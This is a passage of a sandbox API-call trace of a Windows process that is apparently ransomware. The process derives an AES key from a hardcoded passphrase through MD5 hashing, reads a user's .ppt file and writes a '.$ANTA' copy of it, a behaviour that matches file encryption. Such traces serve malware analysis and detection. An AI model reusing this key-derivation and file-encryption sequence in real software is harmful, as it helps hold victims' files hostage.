CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0081.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cb3a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0081.534] CryptCreateHash (in: hProv=0x41a40c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0081.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0081.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0081.534] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0081.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0081.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0081.534] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.534] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0081.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c3668, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0081.534] CryptHashData (hHash=0x41ac180, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0081.534] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.534] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0081.534] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0081.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c3728, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0081.534] CryptDeriveKey (in: hProv=0x41a40c8, Algid=0x6610, hBaseData=0x41ac180, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac740) returned 1 [0081.534] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0081.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0081.535] CryptDestroyHash (hHash=0x41ac180) returned 1 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3908 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38d8 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c39e0 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3aa0 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a40 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a28 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0081.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0081.536] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0081.536] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0081.536] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0081.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0081.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0081.536] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\HGH4Uw7jgwUTEi7Vo_.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\hgh4uw7jgwutei7vo_.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0081.537] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.537] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0081.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0081.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0081.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0081.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0081.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0081.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0081.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0081.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.537] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0081.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0081.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0081.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0081.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0081.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0081.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0081.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0081.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0081.537] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0081.537] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0081.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0081.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0081.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0081.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0081.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0081.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0081.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0081.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a88c8 [0081.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359cd8 [0081.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0081.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359c08 [0081.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a88c8 | out: hHeap=0x1780000) returned 1 [0081.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0081.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0081.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0081.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0081.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359cd8 | out: hHeap=0x1780000) returned 1 [0081.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0081.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0081.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0081.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431db18 [0081.539] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w")) returned 0x10 [0081.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431db18 | out: hHeap=0x1780000) returned 1 [0081.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359c08 | out: hHeap=0x1780000) returned 1 [0081.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0081.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0081.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0081.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0081.540] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\HGH4Uw7jgwUTEi7Vo_.ppt.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\hgh4uw7jgwutei7vo_.ppt.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0081.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0081.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0081.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0081.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0081.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0081.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0081.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0081.541] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0081.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0081.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0081.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0081.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0081.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0081.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0081.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0081.542] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0081.542] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0081.542] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0081.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0081.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0081.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0081.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0081.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0081.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0081.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0081.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0081.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0081.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e02020 [0081.545] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0081.545] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x10000, lpOverlapped=0x0) returned 1 [0081.547] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x7655, lpOverlapped=0x0) returned 1 [0081.548] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0081.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0081.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0081.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17655) returned 0x499a008 [0081.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e02020 | out: hHeap=0x1780000) returned 1 [0081.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0081.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0081.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17655) returned 0x49b1668 [0081.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0081.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.551] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0081.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 